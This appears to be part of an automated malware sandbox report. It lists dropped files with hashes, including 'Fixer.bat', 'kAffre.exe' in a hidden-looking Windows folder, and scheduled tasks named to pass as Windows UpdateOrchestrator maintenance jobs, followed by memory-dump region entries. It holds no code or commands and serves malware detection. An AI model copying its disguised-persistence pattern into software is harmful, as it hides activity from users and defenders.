                                                                                                                                                                                                    e0ed940dd5e72400cd69d53a59216af270adbfd107742485db35b4623ed710e6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    f73d3ec83eff892ca425cc7cacf2e06f77b0edd24a8b5fa4e8ff02349a9653553884e3ee41c650bc17598392da08a8e230eadf129dcac4e0ea1e19d01ac84bbe

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_maalrctl.kv2.ps1

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    60B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Fixer.bat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.4MB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    2fe951de913b3076a2e0278089f8a404

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    a26e73180e7d766f0dc23a3fd716ab8715849241

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    c15e1c068d7052a1a8003dc352610dabb49c5aff41ad73804284cd462460fc3b

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    e3de3dbee160db23e64f4735a9d86ba627c7e1fdf8917291df8e5b478ac17cfc822acab539a3a86f82fc0dd71598a250d346c44ebb2b79d816dc442fd064f40f

                                                                                                                                                                                                  • C:\Windows\$nya-onimai2\kAffre.exe

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    36KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    b943a57bdf1bbd9c33ab0d33ff885983

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1cee65eea1ab27eae9108c081e18a50678bd5cdc

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    f313c5b4f95605026428425586317353

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                                                  • memory/60-81-0x0000023135990000-0x00000231359BA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-36-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-47-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-34-0x0000023204D00000-0x0000023204D24000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    144KB

                                                                                                                                                                                                  • memory/608-45-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-46-0x00007FFEC7F90000-0x00007FFEC7FA0000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    64KB

                                                                                                                                                                                                  • memory/608-35-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-44-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-41-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-42-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/608-43-0x0000023204D30000-0x0000023204D5A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/672-59-0x000001997C2B0000-0x000001997C2DA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/672-61-0x00007FFEC7F90000-0x00007FFEC7FA0000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    64KB

                                                                                                                                                                                                  • memory/672-58-0x000001997C2B0000-0x000001997C2DA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/672-57-0x000001997C2B0000-0x000001997C2DA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/672-56-0x000001997C2B0000-0x000001997C2DA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/672-51-0x000001997C2B0000-0x000001997C2DA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/672-62-0x000001997C2B0000-0x000001997C2DA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/672-60-0x000001997C2B0000-0x000001997C2DA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/948-75-0x000001B152E10000-0x000001B152E3A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/948-66-0x000001B152E10000-0x000001B152E3A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/948-72-0x000001B152E10000-0x000001B152E3A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/948-73-0x000001B152E10000-0x000001B152E3A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/948-74-0x000001B152E10000-0x000001B152E3A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/948-71-0x000001B152E10000-0x000001B152E3A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/948-76-0x00007FFEC7F90000-0x00007FFEC7FA0000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    64KB

                                                                                                                                                                                                  • memory/948-77-0x000001B152E10000-0x000001B152E3A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    168KB

                                                                                                                                                                                                  • memory/1516-18-0x0000021163CE0000-0x0000021163D56000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    472KB

                                                                                                                                                                                                  • memory/1516-769-0x000002117CAA0000-0x000002117CE32000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3.6MB

                                                                                                                                                                                                  • memory/1516-7-0x00000211637E0000-0x0000021163802000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    136KB

                                                                                                                                                                                                  • memory/1516-17-0x0000021163C10000-0x0000021163C54000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    272KB

                                                                                                                                                                                                  • memory/1516-19-0x00000211493B0000-0x00000211493EA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    232KB

                                                                                                                                                                                                  • memory/1516-20-0x000002117C450000-0x000002117C896000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.3MB

                                                                                                                                                                                                  • memory/1516-21-0x00007FFF07F10000-0x00007FFF08105000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                  • memory/1516-22-0x00007FFF06090000-0x00007FFF0614E000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    760KB

                                                                                                                                                                                                  • memory/1644-1-0x0000000000230000-0x000000000099A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.4MB

                                                                                                                                                                                                  • memory/1644-0-0x00007FFEE9E93000-0x00007FFEE9E95000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                  • memory/1780-29-0x00007FFF07F10000-0x00007FFF08105000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                  • memory/1780-23-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    32KB

                                                                                                                                                                                                  • memory/1780-25-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    32KB

                                                                                                                                                                                                  • memory/1780-28-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    32KB

                                                                                                                                                                                                  • memory/1780-30-0x00007FFF06090000-0x00007FFF0614E000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    760KB

                                                                                                                                                                                                  • memory/1780-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    32KB

                                                                                                                                                                                                  • memory/1780-26-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    32KB

                                                                                                                                                                                                  • memory/1780-31-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    32KB

                                                                                                                                                                                                  • memory/3036-2778-0x0000017FCEF30000-0x0000017FCEF3E000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    56KB

                                                                                                                                                                                                  • memory/5048-2547-0x0000021875580000-0x0000021875592000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    72KB

                                                                                                                                                                                                  • memory/5048-2472-0x00000218786E0000-0x00000218788A2000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.8MB

                                                                                                                                                                                                  • memory/5048-2471-0x00000218756C0000-0x0000021875772000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    712KB

                                                                                                                                                                                                  • memory/5048-2470-0x00000218755B0000-0x0000021875600000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    320KB

                                                                                                                                                                                                  • memory/5048-2405-0x00000218775B0000-0x0000021877D34000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.5MB

                                                                                                                                                                                                  • memory/5048-2548-0x0000021875640000-0x000002187567C000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    240KB

                                                                                                                                                                                                  • memory/5048-3506-0x0000021879890000-0x0000021879DB8000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    5.2MB